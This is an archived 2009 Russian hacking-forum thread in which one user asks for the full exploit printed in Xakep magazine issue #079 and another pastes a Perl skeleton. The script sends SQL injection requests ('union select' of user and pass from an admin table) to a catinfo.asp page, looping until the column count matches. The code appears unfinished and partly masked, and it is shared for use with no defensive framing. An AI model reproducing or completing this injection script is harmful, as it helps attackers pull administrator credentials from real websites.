Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Сплойт от #079

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> Сплойт от #079
Имя
Сообщение << Старые топики   Новые топики >>
Сплойт от #079 - 2009-05-27 16:31:49.460000   
CTrator

Сообщений: 100
Оценки: 0
Присоединился: 2009-03-03 18:12:11.360000
 http://www.xakep.ru//magazine/xa/079/058/1.asp
Найдется у кого cd от этого номера? мне этот сплойт очень нужен….
Зарание спасиб))
Post #: 1
RE: Сплойт от #079 - 2009-05-27 18:35:05.096666   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 ??
Наш нехитрый сплойт #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; $port=80; $se="error_occ"; $i=0; while($se=~/error_occ/) { socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); $iaddr = inet_aton($host); $paddr = sockaddr_in($port, $iaddr); connect(SOCK, $paddr); $quest="GET $path/catinfo.asp?cat='%20union%20select%201,pass,user,1,1,1,1,1,1,1"; for($j=0; $j&lt;$i;$j++) { $quest.=",1"; } $quest.="%20from%20tblAdm"; $quest.=" HTTP/1.1\n"; $quest.="Host: $host\n\n\r\n\n"; send (SOCK, $quest, 0); $se="no_error"; while($data=&lt;SOCK&gt;) { if ($data=~/Internal Server Error/ or $data=~/Database Engine error/) { $se="error_occ";}} close(SOCK); $i++; } print "[+]Optimal number of params found: ".$k."\n"; XXXXXXXXXXXXXXXX
Post #: 2
RE: Сплойт от #079 - 2009-05-27 20:45:12.640000   
CTrator

Сообщений: 100
Оценки: 0
Присоединился: 2009-03-03 18:12:11.360000
quote:

Надо понимать, что напечатанный в журнале код – это лишь скелет полноценного сплойта. Окончательную версию отмычки ты найдешь на нашем диске.


хмм… это то и я вижу, а вот полный код….
Post #: 3
Страниц:  [1]
Все форумы >> [В Сети] >> Сплойт от #079







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.